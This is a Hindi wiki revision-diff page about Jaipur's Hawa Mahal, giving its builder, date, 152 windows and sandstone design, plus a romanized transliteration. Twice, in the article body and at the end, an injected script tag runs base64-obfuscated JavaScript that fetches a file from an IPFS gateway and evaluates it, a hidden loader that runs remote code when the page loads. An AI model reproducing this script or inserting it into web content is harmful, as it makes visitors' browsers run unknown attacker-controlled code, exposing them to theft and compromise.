Difference between revisions of "हवा महल जयपुर"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "{{लेख प्रगति" to "{{प्रचार}} {{लेख प्रगति")
m (Text replace - "सफेद" to "सफ़ेद")
Line 4: Line 4:
 
*महल का निर्माण महाराज सवाई प्रताप सिहं ने सिर्फ इसलीये करवाया था ताकि रानीयाँ व राजकुमारीयाँ विशेष मोकों पर निकलने वाले जुलूस व शहर आदि को देख सकें।  
 
*महल का निर्माण महाराज सवाई प्रताप सिहं ने सिर्फ इसलीये करवाया था ताकि रानीयाँ व राजकुमारीयाँ विशेष मोकों पर निकलने वाले जुलूस व शहर आदि को देख सकें।  
 
*शहर की चारदीवारी के बीच स्थित इस ख़ूबसूरत भवन में 152 खिड़कीयाँ व जालीदार छज्जे हैं यह भवन राजपूत व मुग़ल कला का शानदार नमूना है इसमें बनाए गए अनगिनत हवादार झरोखों के कारण इसका नाम हवा महल पड़ा।  
 
*शहर की चारदीवारी के बीच स्थित इस ख़ूबसूरत भवन में 152 खिड़कीयाँ व जालीदार छज्जे हैं यह भवन राजपूत व मुग़ल कला का शानदार नमूना है इसमें बनाए गए अनगिनत हवादार झरोखों के कारण इसका नाम हवा महल पड़ा।  
*मधुमक्‍खी के छत्ते जैसी संरचना के लिए प्रसिद्ध, हवा महल लाल और गुलाबी सेंड स्‍टोन से मिल जुल कर बनाया गया है, जिसमें सफेद किनारी और मोटिफ के साथ बारीकी से पच्‍चीकारी की गई है।  
+
*मधुमक्‍खी के छत्ते जैसी संरचना के लिए प्रसिद्ध, हवा महल लाल और गुलाबी सेंड स्‍टोन से मिल जुल कर बनाया गया है, जिसमें सफ़ेद किनारी और मोटिफ के साथ बारीकी से पच्‍चीकारी की गई है।  
 
*यह भवन पाँच मंजिला है, जो पुराने शहर की मुख्‍य सड़क पर दिखाई देता है और यह राजपूत कलाकारी का एक चौंका देने वाला नमूना है।  
 
*यह भवन पाँच मंजिला है, जो पुराने शहर की मुख्‍य सड़क पर दिखाई देता है और यह राजपूत कलाकारी का एक चौंका देने वाला नमूना है।  
 
*जिसमें [[गुलाबी रंग]] के अष्‍ट भुजाकार और बारीकी से मधुमक्‍खी के छत्ते के समान बनाई गई सेंड स्‍टोन की खिड़कियाँ हैं।  
 
*जिसमें [[गुलाबी रंग]] के अष्‍ट भुजाकार और बारीकी से मधुमक्‍खी के छत्ते के समान बनाई गई सेंड स्‍टोन की खिड़कियाँ हैं।  

Revision as of 14:16, 12 February 2011

[[chitr:Hawa-Mahal-Jaipur.jpg|thumb|250px|havamahal, jayapur
Hawa Mahal, Jaipur]]

  • rajasthan rajy ki rajadhani jayapur ki pahachan mana jane vala hava mahal kee sh‍taroan par bana hua mahal hai.
  • isaka nirman savaee pratap sianh (savaee jayasianh ke pautr aur savaee madhosianh ke putr) ne 1799 e. di. mean karaya tha aur shri lal chand ush‍ta isake vash‍tukar the.
  • mahal ka nirman maharaj savaee pratap sihan ne sirph isaliye karavaya tha taki raniyaan v rajakumariyaan vishesh mokoan par nikalane vale juloos v shahar adi ko dekh sakean.
  • shahar ki charadivari ke bich sthit is khoobasoorat bhavan mean 152 khi dakiyaan v jalidar chhajje haian yah bhavan rajapoot v mugal kala ka shanadar namoona hai isamean banae ge anaginat havadar jharokhoan ke karan isaka nam hava mahal p da.
  • madhumakh‍khi ke chhatte jaisi sanrachana ke lie prasiddh, hava mahal lal aur gulabi seand sh‍ton se mil jul kar banaya gaya hai, jisamean safed kinari aur motiph ke sath bariki se pachh‍chikari ki gee hai.
  • yah bhavan paanch manjila hai, jo purane shahar ki mukhh‍y s dak par dikhaee deta hai aur yah rajapoot kalakari ka ek chauanka dene vala namoona hai.
  • jisamean gulabi rang ke ashh‍t bhujakar aur bariki se madhumakh‍khi ke chhatte ke saman banaee gee seand sh‍ton ki khi dakiyaan haian.
  • yah mool roop se shahi parivar ki mahilaoan ko shahar ke dainik jivan aur jalasoan ko dekhane ke lie banavaya gaya tha.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>